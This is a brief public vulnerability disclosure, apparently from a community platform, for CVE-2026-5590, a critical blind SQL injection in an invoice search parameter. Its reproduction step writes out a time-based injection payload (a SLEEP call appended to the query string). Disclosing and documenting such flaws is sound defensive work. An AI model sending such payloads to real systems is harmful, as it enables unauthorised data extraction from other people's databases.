CriticalCVE-2026-5590CWE-89A03:2021 Injection
Inyección SQL ciega en el buscador de facturas
Disclosure basisAlready public vulnerabilityCVE-2026-5590
Silk Navarro@s1lk
0
Community vote9.1
Critical
CVSS 3.1 base score
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
// Executive summary
El parámetro <code>q</code> concatena directo en la query; time-based blind confirma extracción de <code>users</code>.
// Reproduction steps
GET /invoices?q=a' AND SLEEP(5)-- - # 5s de delay confirma SQLi
Comments
0